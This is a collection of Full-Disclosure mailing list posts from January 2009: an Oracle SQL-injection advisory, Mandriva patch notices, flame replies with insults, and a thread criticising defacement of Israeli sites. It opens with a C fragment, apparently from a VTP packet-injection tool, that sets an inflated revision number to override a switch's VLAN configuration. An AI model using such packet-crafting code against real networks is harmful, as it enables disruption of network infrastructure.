aux+=sizeof(cisco_data); vtp_sub = (struct vtp_subset *)aux; vtp_sub-version = 0x01; vtp_sub-code = 0x02; //vtp_subset vtp_sub-seq = 0x01; vtp_sub-dom_len = strlen(domain); memcpy(vtp_sub-domain,domain,strlen(domain)); vtp_sub-revision = htonl(2000);//bigger than the current revision number will ok // memcpy(vtp_sub-aaa,aaa,strlen(aaa)); t = libnet_build_802_2( 0xaa,/* DSAP */ 0xaa,/* SSAP */ 0x03,/* control */ vtp_packet2, /* payload */ vtp_len, /* payload size */ lhandler,/* libnet handle */
[Full-disclosure] Trigger Abuse of MDSYS.SDO_TOPO_DROP_FTBL in Oracle 10g R1 and R2
NGSSoftware Insight Security Research Advisory Name: Trigger abuse of MDSYS.SDO_TOPO_DROP_FTBL Systems Affected: Oracle 10g R1 and R2 (10.1.0.5 and 10.2.0.2) Severity: High Vendor URL: http://www.oracle.com/ Author: David Litchfield [ dav...@ngssoftware.com ] Reported: 23rd July 2008 Date of Public Advisory: 13th January 2009 Advisory number: #NISR13012009 CVE: CVE-2008-3979 Overview Oracle has just released a fix for a flaw that, when exploited, allows a low privileged authenticated database user to gain MDSYS privileges. This can be abused by an attacker to perform actions as the MDSYS user. Details *** MDSYS.SDO_TOPO_DROP_FTBL is one of the triggers that forms part of the Oracle Spatial Application. It is vulnerable to SQL injection. When a user drops a table the trigger fires. The name of the table is embedded in a dynamic SQL query which is then executed by the trigger. Note that the Oracle advisory states that the attacker requires the DROP TABLE and CREATE PROCEDURE privileges. This is not the case and only CREATE SESSION privileges are required. Fix Information *** Oracle was alerted to this flaw on the 23rd July 2008. A patch has now been made available: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html NGSSQuirreL for Oracle, an advanced vulnerability assessment scanner designed specifically for Oracle, can be used to accurately determine whether your servers are vulnerable to these flaws. More information about NGSSQuirreL for Oracle can be found here: http://www.ngssoftware.com/products/database-security/ngs-squirrel-oraclephp About NGSSoftware * NGSSoftware, an NCC Group Company, develops vulnerability assessment and compliancy tools for database servers including Oracle, Microsoft SQL Server, DB2, Sybase and Informix. Headquartered in the United Kingdom NGS has offices in London, St. Andrews (UK), Brisbane, and Perth (Australia) and Seattle in the United States; NGS provide services to some of the largest and most demanding organizations around the globe. http://www.ngssoftware.com/ Telephone +44 208 401 0070 Fax +44 208 401 0076 -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: Manchester Technology Centre, Oxford Road, Manchester, M1 7EF with Company Number 04225835 and VAT Number 783096402 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Simple request
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 the fuck have you done juan? your more worthless than ureleet 3 2 n3td3v On Tue, 13 Jan 2009 05:24:29 -0800 Juha-Matti Laurio juha- matti.lau...@netti.fi wrote: FYI: Since 1st Jan there are 527 messages posted to FD. The overall amount of Dec' 08 was 637 messages and we haven't passed the mid-January yet. Some numbers of 2008: Oct '08: 531 Mar '08: 600 Jan '08: 615 Hey how many of the recent messages use bandwidth, disk space, your time etc. without disclosing anything... Juha-Matti ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkltL+0ACgkQynWwk3/AtyO+bQQAlIDLO+QrbEkaDuPIItw5h3FAwMbr tCEkp9zvqaIN+qbxE0X17wR/skwhkb/fr8yQwPOjlA7NynUXh/08UJ6AjtwgZXHC9xib die0B55bUQy6hl6Y6t+4xTRdxKhulilVYZMqgAakQ4pCOSQNu0dfYAoHQaiYT6Wwe3PG LaqimvI= =QVQi -END PGP SIGNATURE- -- Click to begin your health care training online. Request info today. http://tagline.hushmail.com/fc/PnY6qxukq4rukiZOMFLrudw7rHD8typKRtrOK1cbGVmvO3cAsN4RC/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Trigger Abuse of MDSYS.SDO_TOPO_DROP_FTBL in Oracle 10g R1 and R2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 afaik, no one cares about oracle. retarded blind scavengers make careers selling fallen, rotten, previously low hanging fruit. 3 2 n3td3v Tue, 13 Jan 2009 15:52:02 -0800 David Litchfield dav...@ngssoftware.com wrote: NGSSoftware Insight Security Research Advisory Name: Trigger abuse of MDSYS.SDO_TOPO_DROP_FTBL Systems Affected: Oracle 10g R1 and R2 (10.1.0.5 and 10.2.0.2) Severity: High Vendor URL: http://www.oracle.com/ Author: David Litchfield [ dav...@ngssoftware.com ] Reported: 23rd July 2008 Date of Public Advisory: 13th January 2009 Advisory number: #NISR13012009 CVE: CVE-2008-3979 Overview Oracle has just released a fix for a flaw that, when exploited, allows a low privileged authenticated database user to gain MDSYS privileges. This can be abused by an attacker to perform actions as the MDSYS user. Details *** MDSYS.SDO_TOPO_DROP_FTBL is one of the triggers that forms part of the Oracle Spatial Application. It is vulnerable to SQL injection. When a user drops a table the trigger fires. The name of the table is embedded in a dynamic SQL query which is then executed by the trigger. Note that the Oracle advisory states that the attacker requires the DROP TABLE and CREATE PROCEDURE privileges. This is not the case and only CREATE SESSION privileges are required. Fix Information *** Oracle was alerted to this flaw on the 23rd July 2008. A patch has now been made available: http://www.oracle.com/technology/deploy/security/critical-patch- updates/cpujan2009.html NGSSQuirreL for Oracle, an advanced vulnerability assessment scanner designed specifically for Oracle, can be used to accurately determine whether your servers are vulnerable to these flaws. More information about NGSSQuirreL for Oracle can be found here: http://www.ngssoftware.com/products/database-security/ngs-squirrel- oraclephp About NGSSoftware * NGSSoftware, an NCC Group Company, develops vulnerability assessment and compliancy tools for database servers including Oracle, Microsoft SQL Server, DB2, Sybase and Informix. Headquartered in the United Kingdom NGS has offices in London, St. Andrews (UK), Brisbane, and Perth (Australia) and Seattle in the United States; NGS provide services to some of the largest and most demanding organizations around the globe. http://www.ngssoftware.com/ Telephone +44 208 401 0070 Fax +44 208 401 0076 -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: Manchester Technology Centre, Oxford Road, Manchester, M1 7EF with Company Number 04225835 and VAT Number 783096402 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkltMpcACgkQynWwk3/AtyOsbgP+LVLiKWqeGvuu/kFnm7sQXic8l5k1 9RYQ902ygOS4Nt67IkUgFgZBeTsN25d0mkH0hZDHulhTJOPNFGxwLuRVbXBF89JwjCO7 faHEhS73TGVmm3TnUTm1ZGEg1dto36LomtrR/H1YMmMnY41RCoK1ycj8QeEFfOFiuK/v AKEkLFw= =Y0II -END PGP SIGNATURE- -- Dreaming of a career in Medical Administration? Click here to make your dream career a reality. http://tagline.hushmail.com/fc/PnY6qxukq5RffaxISSWG6OsKAmNS1Ot26fn4GDJCCtUikCP599Qla/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Trigger Abuse of MDSYS.SDO_TOPO_DROP_FTBL in Oracle 10g R1 and R2
stfu . 2009/1/13 sexyazngr...@mac.hush.com -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 afaik, no one cares about oracle. retarded blind scavengers make careers selling fallen, rotten, previously low hanging fruit. 3 2 n3td3v Tue, 13 Jan 2009 15:52:02 -0800 David Litchfield dav...@ngssoftware.com wrote: NGSSoftware Insight Security Research Advisory Name: Trigger abuse of MDSYS.SDO_TOPO_DROP_FTBL Systems Affected: Oracle 10g R1 and R2 (10.1.0.5 and 10.2.0.2) Severity: High Vendor URL: http://www.oracle.com/ Author: David Litchfield [ dav...@ngssoftware.com ] Reported: 23rd July 2008 Date of Public Advisory: 13th January 2009 Advisory number: #NISR13012009 CVE: CVE-2008-3979 Overview Oracle has just released a fix for a flaw that, when exploited, allows a low privileged authenticated database user to gain MDSYS privileges. This can be abused by an attacker to perform actions as the MDSYS user. Details *** MDSYS.SDO_TOPO_DROP_FTBL is one of the triggers that forms part of the Oracle Spatial Application. It is vulnerable to SQL injection. When a user drops a table the trigger fires. The name of the table is embedded in a dynamic SQL query which is then executed by the trigger. Note that the Oracle advisory states that the attacker requires the DROP TABLE and CREATE PROCEDURE privileges. This is not the case and only CREATE SESSION privileges are required. Fix Information *** Oracle was alerted to this flaw on the 23rd July 2008. A patch has now been made available: http://www.oracle.com/technology/deploy/security/critical-patch- updates/cpujan2009.html NGSSQuirreL for Oracle, an advanced vulnerability assessment scanner designed specifically for Oracle, can be used to accurately determine whether your servers are vulnerable to these flaws. More information about NGSSQuirreL for Oracle can be found here: http://www.ngssoftware.com/products/database-security/ngs-squirrel- oraclephp About NGSSoftware * NGSSoftware, an NCC Group Company, develops vulnerability assessment and compliancy tools for database servers including Oracle, Microsoft SQL Server, DB2, Sybase and Informix. Headquartered in the United Kingdom NGS has offices in London, St. Andrews (UK), Brisbane, and Perth (Australia) and Seattle in the United States; NGS provide services to some of the largest and most demanding organizations around the globe. http://www.ngssoftware.com/ Telephone +44 208 401 0070 Fax +44 208 401 0076 -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: Manchester Technology Centre, Oxford Road, Manchester, M1 7EF with Company Number 04225835 and VAT Number 783096402 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkltMpcACgkQynWwk3/AtyOsbgP+LVLiKWqeGvuu/kFnm7sQXic8l5k1 9RYQ902ygOS4Nt67IkUgFgZBeTsN25d0mkH0hZDHulhTJOPNFGxwLuRVbXBF89JwjCO7 faHEhS73TGVmm3TnUTm1ZGEg1dto36LomtrR/H1YMmMnY41RCoK1ycj8QeEFfOFiuK/v AKEkLFw= =Y0II -END PGP SIGNATURE- -- Dreaming of a career in Medical Administration? Click here to make your dream career a reality. http://tagline.hushmail.com/fc/PnY6qxukq5RffaxISSWG6OsKAmNS1Ot26fn4GDJCCtUikCP599Qla/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:007 ] ntp
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:007 http://www.mandriva.com/security/ ___ Package : ntp Date: January 13, 2009 Affected: 2008.0, 2008.1, 2009.0, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0 ___ Problem Description: A flaw was found in how NTP checked the return value of signature verification. A remote attacker could use this to bypass certificate validation by using a malformed SSL/TLS signature (CVE-2009-0021). The updated packages have been patched to prevent this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0021 ___ Updated Packages: Mandriva Linux 2008.0: 91f0330a936cb343029aec711da0ce4f 2008.0/i586/ntp-4.2.4-10.1mdv2008.0.i586.rpm e7e6559f0431ff856d0da0b1d5a590a4 2008.0/i586/ntp-client-4.2.4-10.1mdv2008.0.i586.rpm 05f3b3c5777f6bef48ee85fefeaff8a8 2008.0/i586/ntp-doc-4.2.4-10.1mdv2008.0.i586.rpm a9cd3b03e611b517664ffae074da31da 2008.0/SRPMS/ntp-4.2.4-10.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: e68c5263d456ec90d157787e70b17b99 2008.0/x86_64/ntp-4.2.4-10.1mdv2008.0.x86_64.rpm 85e0c28eae68bcdcca997c5c2bb9bf8c 2008.0/x86_64/ntp-client-4.2.4-10.1mdv2008.0.x86_64.rpm ffbd2a9f924478d27f33ad13e1c4e250 2008.0/x86_64/ntp-doc-4.2.4-10.1mdv2008.0.x86_64.rpm a9cd3b03e611b517664ffae074da31da 2008.0/SRPMS/ntp-4.2.4-10.1mdv2008.0.src.rpm Mandriva Linux 2008.1: 1a9909288448845fa41b220b50917ee1 2008.1/i586/ntp-4.2.4-15.1mdv2008.1.i586.rpm 6693319db15308f559912c9fe989bdd6 2008.1/i586/ntp-client-4.2.4-15.1mdv2008.1.i586.rpm 63758cadb1cf81ebb7bef096dc285f2f 2008.1/i586/ntp-doc-4.2.4-15.1mdv2008.1.i586.rpm ca06251ccab188cdb4f28fba35190eb6 2008.1/SRPMS/ntp-4.2.4-15.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 9c7b290e643cae08556bd3b1f6380926 2008.1/x86_64/ntp-4.2.4-15.1mdv2008.1.x86_64.rpm 7fd00c9b82a0ca577962d59975433071 2008.1/x86_64/ntp-client-4.2.4-15.1mdv2008.1.x86_64.rpm f99d1d7980dd6788a0f0c4924241a6d3 2008.1/x86_64/ntp-doc-4.2.4-15.1mdv2008.1.x86_64.rpm ca06251ccab188cdb4f28fba35190eb6 2008.1/SRPMS/ntp-4.2.4-15.1mdv2008.1.src.rpm Mandriva Linux 2009.0: 82ed4b25f0a0c1c607e5819ec1d70603 2009.0/i586/ntp-4.2.4-18.1mdv2009.0.i586.rpm 71855df81d8dd138d54fb24f5c221a5b 2009.0/i586/ntp-client-4.2.4-18.1mdv2009.0.i586.rpm 30874a706c15d4086df8493af51f5082 2009.0/i586/ntp-doc-4.2.4-18.1mdv2009.0.i586.rpm 248052356a2606f377debf55257b6855 2009.0/SRPMS/ntp-4.2.4-18.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: c6462453877b538618e8bf8d0132b1a3 2009.0/x86_64/ntp-4.2.4-18.1mdv2009.0.x86_64.rpm abe80d9922eb665d6e5be56197895a68 2009.0/x86_64/ntp-client-4.2.4-18.1mdv2009.0.x86_64.rpm eb780b2e38ebb1b4ee1999c4f0429231 2009.0/x86_64/ntp-doc-4.2.4-18.1mdv2009.0.x86_64.rpm 248052356a2606f377debf55257b6855 2009.0/SRPMS/ntp-4.2.4-18.1mdv2009.0.src.rpm Corporate 3.0: d1593543a5d37e6b8ea2c8468ce1d0d3 corporate/3.0/i586/ntp-4.2.0-2.1.C30mdk.i586.rpm fc6c1a4605258d876c8a09d7d0d116ef corporate/3.0/SRPMS/ntp-4.2.0-2.1.C30mdk.src.rpm Corporate 3.0/X86_64: 1214dd1fed42c4acd3ad36da9bd8b0ea corporate/3.0/x86_64/ntp-4.2.0-2.1.C30mdk.x86_64.rpm fc6c1a4605258d876c8a09d7d0d116ef corporate/3.0/SRPMS/ntp-4.2.0-2.1.C30mdk.src.rpm Corporate 4.0: dcc6abed648d3baac3233264bc107517 corporate/4.0/i586/ntp-4.2.0-21.3.20060mlcs4.i586.rpm d1c9cf4d821856af81ce574fa08c1f52 corporate/4.0/i586/ntp-client-4.2.0-21.3.20060mlcs4.i586.rpm 50c665296cd7d09f4e98ae04e998e350 corporate/4.0/SRPMS/ntp-4.2.0-21.3.20060mlcs4.src.rpm Corporate 4.0/X86_64: 6c41fd0f995d8cf8cf216bf82e062de0 corporate/4.0/x86_64/ntp-4.2.0-21.3.20060mlcs4.x86_64.rpm da7f3cd1385ae2250cd191182079c037 corporate/4.0/x86_64/ntp-client-4.2.0-21.3.20060mlcs4.x86_64.rpm 50c665296cd7d09f4e98ae04e998e350 corporate/4.0/SRPMS/ntp-4.2.0-21.3.20060mlcs4.src.rpm Multi Network Firewall 2.0: d7ff99538a0da678adcc5606913bc1b6 mnf/2.0/i586/ntp-4.2.0-2.1.C30mdk.i586.rpm c8af767376df674dd434307c628e30cd mnf/2.0/SRPMS/ntp-4.2.0-2.1.C30mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report
[Full-disclosure] [ MDVSA-2009:008 ] qemu
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:008 http://www.mandriva.com/security/ ___ Package : qemu Date: January 14, 2009 Affected: 2009.0 ___ Problem Description: Security vulnerabilities have been discovered and corrected in VNC server of qemu version 0.9.1 and earlier, which could lead to denial-of-service attacks (CVE-2008-2382), and make it easier for remote crackers to guess the VNC password (CVE-2008-5714). The updated packages have been patched to prevent this. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2382 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5714 ___ Updated Packages: Mandriva Linux 2009.0: 502c50a55fdb3e3e8ab0456be79a08b1 2009.0/i586/dkms-kqemu-1.4.0-0.pre1.0.1mdv2009.0.i586.rpm bf48619b2f7cb0275d379682a4795dc1 2009.0/i586/qemu-0.9.1-0.r5137.1.1mdv2009.0.i586.rpm 4fb74c4d8356442ccd9c6ddd063f4191 2009.0/i586/qemu-img-0.9.1-0.r5137.1.1mdv2009.0.i586.rpm 5a32fdf2019085e4c3d386bad34b1900 2009.0/SRPMS/qemu-0.9.1-0.r5137.1.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 99f7c6b4de73bcab46664c90ae6edc50 2009.0/x86_64/dkms-kqemu-1.4.0-0.pre1.0.1mdv2009.0.x86_64.rpm a22b95b6a4673f1300742b4777c4149b 2009.0/x86_64/qemu-0.9.1-0.r5137.1.1mdv2009.0.x86_64.rpm 502371419a98b187c9db90e4217242de 2009.0/x86_64/qemu-img-0.9.1-0.r5137.1.1mdv2009.0.x86_64.rpm 5a32fdf2019085e4c3d386bad34b1900 2009.0/SRPMS/qemu-0.9.1-0.r5137.1.1mdv2009.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJbVFvmqjQ0CJFipgRAjcTAJ4rTf6Icqu1/43aSLb/G0TZbE4IFwCeKQN2 MzEgGFk72/muA0J0kDkvqhc= =g6Xd -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:009 ] kvm
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:009 http://www.mandriva.com/security/ ___ Package : kvm Date: January 14, 2009 Affected: 2009.0 ___ Problem Description: Security vulnerabilities have been discovered and corrected in VNC server of kvm version 79 and earlier, which could lead to denial-of-service attacks (CVE-2008-2382), and make it easier for remote crackers to guess the VNC password (CVE-2008-5714). The updated packages have been patched to prevent this. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2382 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5714 ___ Updated Packages: Mandriva Linux 2009.0: acdff9c09970bba49f5b500723092f2b 2009.0/i586/kvm-74-3.1mdv2009.0.i586.rpm 8ee1433de23a7fec8bc768a66585368c 2009.0/SRPMS/kvm-74-3.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: b84f9ff6c8005e7de6996b3e1f04335d 2009.0/x86_64/kvm-74-3.1mdv2009.0.x86_64.rpm 8ee1433de23a7fec8bc768a66585368c 2009.0/SRPMS/kvm-74-3.1mdv2009.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJbVRimqjQ0CJFipgRAoEPAJ0dZtxXkpX7Ft2YHREKrePd7QV9WgCg827W ha/fMpm4QxG0vwCrbHMLjK4= =iT86 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] e-Holocaust
Okay e.hitler you mention you're attacking Israeli servers*, lets ignore the impact of that for a second. e.Hitler I want you to tell me, in more than a sentence, why you did that. Yeh, you failed to mention it in your original post. Tell me exactly how your cause makes you feel, and why. Now tell me how what you're doing makes a difference, that is: 'In what way does what you did help solve the problem that was bothering you?' (read it!: HOW does it make a difference, don't just tell me THAT it makes a difference, I want you to describe out a sequence of events. One more question. Do you think you're a good hacker (in terms of skill). I'm not saying you're good or bad, I've no idea. Further more I couldn't tell you what makes a good hacker, I don't know enough (any) of them. Do you think that this event here proves that, or at least aids proving it? *Btw defacements happen all the time - wanna do some research on pathetic skiddies? search the 'google dorks' included in web app exploits when they're published on milw0rm. They're actually competing for the servers (re-owning them, etc). Those 21 sites are a drop in the ocean compared to how many (even ant-Israeli, and the other side) defacements have happened. As for the paypal accounts and (so called) 'ownage' of individuals and their personal data, really this is another drop in the ocean for Israel (what its economy). Compare the well-being of these individuals with the number of people being killed in a WAR! Hell! Compare it to the holocaust, now argue with a WWII vet or holocaust survivor (are there any still living?) that you are e.Hitler, righteous internet warrior. Not only that, most CC companies give you the money you lost scams or stolen paypals. You can even cancel it before transactions are payed. Then there's insurance companies. Cheers. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:010 ] qemu
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:010 http://www.mandriva.com/security/ ___ Package : qemu Date: January 14, 2009 Affected: 2008.0, 2008.1 ___ Problem Description: A security vulnerability have been discovered and corrected in VNC server of qemu 0.9.1 and earlier, which could lead to a denial-of-service attack (CVE-2008-2382). The updated packages have been patched to prevent this. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2382 ___ Updated Packages: Mandriva Linux 2008.0: d18f37c8afe834fc75b8d20fd739c35e 2008.0/i586/dkms-kqemu-1.3.0-0.pre11.13.3mdv2008.0.i586.rpm 90ac7511cb7b1ef350b0edeaddcbb61c 2008.0/i586/qemu-0.9.0-16.3mdv2008.0.i586.rpm 14fb383247d38fa1625384e8a5c07106 2008.0/i586/qemu-img-0.9.0-16.3mdv2008.0.i586.rpm 7a7c649d2c0e033767a8f891491fa11a 2008.0/SRPMS/qemu-0.9.0-16.3mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: a199c71663339ff512fc286287aa393f 2008.0/x86_64/dkms-kqemu-1.3.0-0.pre11.13.3mdv2008.0.x86_64.rpm d6ad774c00ab0f8d7583d6903d845bda 2008.0/x86_64/qemu-0.9.0-16.3mdv2008.0.x86_64.rpm d7dfcf881def049285be2f22cb430d8b 2008.0/x86_64/qemu-img-0.9.0-16.3mdv2008.0.x86_64.rpm 7a7c649d2c0e033767a8f891491fa11a 2008.0/SRPMS/qemu-0.9.0-16.3mdv2008.0.src.rpm Mandriva Linux 2008.1: 0b47bf7f27ba348045e167c2e3c69119 2008.1/i586/dkms-kqemu-1.3.0-0.pre11.15.3mdv2008.1.i586.rpm 66202d0f349f70cf8ac1289bb5e70708 2008.1/i586/qemu-0.9.0-18.3mdv2008.1.i586.rpm b2ed2e31823f48695a97f8bbc506e7f6 2008.1/i586/qemu-img-0.9.0-18.3mdv2008.1.i586.rpm 5f7d176cfba6e6b262c14de369eb60e1 2008.1/SRPMS/qemu-0.9.0-18.3mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 2111acd253c95c5633f5389dedf7af1d 2008.1/x86_64/dkms-kqemu-1.3.0-0.pre11.15.3mdv2008.1.x86_64.rpm dd1b9f85874c290458fa4b7943c233ee 2008.1/x86_64/qemu-0.9.0-18.3mdv2008.1.x86_64.rpm e22ca1a87a2a41f8f306da778b15e5f0 2008.1/x86_64/qemu-img-0.9.0-18.3mdv2008.1.x86_64.rpm 5f7d176cfba6e6b262c14de369eb60e1 2008.1/SRPMS/qemu-0.9.0-18.3mdv2008.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJbWPlmqjQ0CJFipgRAnvHAJoD0Inft9/2qDupdRM8u0nBQs81bgCgo28B qXNv6NOXGtRSPKGNS0Acc3o= =DHda -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] e-Holocaust
you had the wrong assumption that he is used to thinking or at least knows how to do that. In order to answer your email in any intelligent manner, he will first have to think. He does not have that skill. On Tue, Jan 13, 2009 at 8:06 PM, Some Guy Posting To Full Disclosure fd.le...@googlemail.com wrote: Okay e.hitler you mention you're attacking Israeli servers*, lets ignore the impact of that for a second. e.Hitler I want you to tell me, in more than a sentence, why you did that. Yeh, you failed to mention it in your original post. Tell me exactly how your cause makes you feel, and why. Now tell me how what you're doing makes a difference, that is: 'In what way does what you did help solve the problem that was bothering you?' (read it!: HOW does it make a difference, don't just tell me THAT it makes a difference, I want you to describe out a sequence of events. One more question. Do you think you're a good hacker (in terms of skill). I'm not saying you're good or bad, I've no idea. Further more I couldn't tell you what makes a good hacker, I don't know enough (any) of them. Do you think that this event here proves that, or at least aids proving it? *Btw defacements happen all the time - wanna do some research on pathetic skiddies? search the 'google dorks' included in web app exploits when they're published on milw0rm. They're actually competing for the servers (re-owning them, etc). Those 21 sites are a drop in the ocean compared to how many (even ant-Israeli, and the other side) defacements have happened. As for the paypal accounts and (so called) 'ownage' of individuals and their personal data, really this is another drop in the ocean for Israel (what its economy). Compare the well-being of these individuals with the number of people being killed in a WAR! Hell! Compare it to the holocaust, now argue with a WWII vet or holocaust survivor (are there any still living?) that you are e.Hitler, righteous internet warrior. Not only that, most CC companies give you the money you lost scams or stolen paypals. You can even cancel it before transactions are payed. Then there's insurance companies. Cheers. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/